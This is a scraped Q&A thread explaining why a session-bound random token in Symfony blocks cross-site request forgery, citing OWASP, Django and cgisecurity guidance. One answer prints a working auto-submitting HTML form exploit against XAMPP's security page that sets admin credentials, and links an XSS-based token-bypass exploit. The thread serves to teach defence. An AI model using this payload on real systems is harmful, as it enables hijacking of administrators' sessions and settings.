开发者

Why can CSRF attack be prevented by a random CSRF secret?

to prevent CSRF attacks, a random CSRF secret has been generated.

The above is from symfony: http://www.symfony-project.org/getting-started/1_4/en/04-Project-Setup

Since it's finally operated by users,which is so called deputy attack.how can it work by set开发者_如何学运维ting that secret?


OWASP (open web application security project) has very good explanation on CSRF, I encourage you to read it and post your questions afterwards.

http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

If you are looking for sample implementation on how to prevent CSRF, take a look at Django and its write-up. http://docs.djangoproject.com/en/dev/ref/contrib/csrf/


CSRF or XSRF stands for Cross Site Request Forgery. The idea is that the attacker is "forging" a HTTP request when a victim executes html or javascript created by the hacker. Here is an example CSRF exploit I wrote against XAMPP. The idea is that this html/js is building a POST request which "rides" on already existing session. The CSRF exploit must be executed by the browser of an XAMPP administrator that is currently logged in.

<html>
    <form action='http://127.0.0.1/security/xamppsecurity.php' method='POST' id=1>
        <input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
        <input type=hidden name="xamppuser" value=admin >
        <input type=hidden name="xampppasswd" value=password>
        <input type=hidden name="xamppaccess" value="Make+safe+the+XAMPP+directory">
        <input type=submit>
    </form>
</html>
<script>
    document.getElementById(1).submit();
</script>

In order to do this the hacker must know a lot about the request ahead of time, most importantly the destination server and all of the variables. The hacker does NOT need to know the sesion id or the "basic-auth" header, this is automatically provided by the browser. If you add a randomly genearted secret then the request cannot be forged unless the hacker knows that value. Its like having a password for every request you send to the server. A hacker CAN obtain this token value using XSS. This is a more complex attack, but here is an exploit that bypass token based CSRF protection using XSS: http://www.milw0rm.com/exploits/7922


Try readng the CSRF FAQ from cgisecurity ( http://www.cgisecurity.com/csrf-faq.html ). When you have questions clarifying the FAQ, we'll be happy to clarify.

EDIT:Quoting for the CSRF FAQ, linked previously,the section that discusses the random secret:

What can I do to protect my own applications?

The most popular suggestion to preventing CSRF involves appending challenge tokens to each request. It is important to state that this challenge token MUST be associated with the user session, otherwise an attacker may be able to fetch a valid token on their own and utilize it in an attack. In addition to being tied to the user session it is important to limit the time peroid to which a token is valid. This method is documented in multiple documents however as pointed out in mailing list postings an attacker can utilize an existing browser vulnerability or XSS flaw to grab this session token.


The CSRF secret in Symfony is well explained here: http://www.nacho-martin.com/csrf-tokens-in-symfony

0

上一篇:

下一篇:

精彩评论

暂无评论...
验证码 换一张
取 消

最新问答

问答排行榜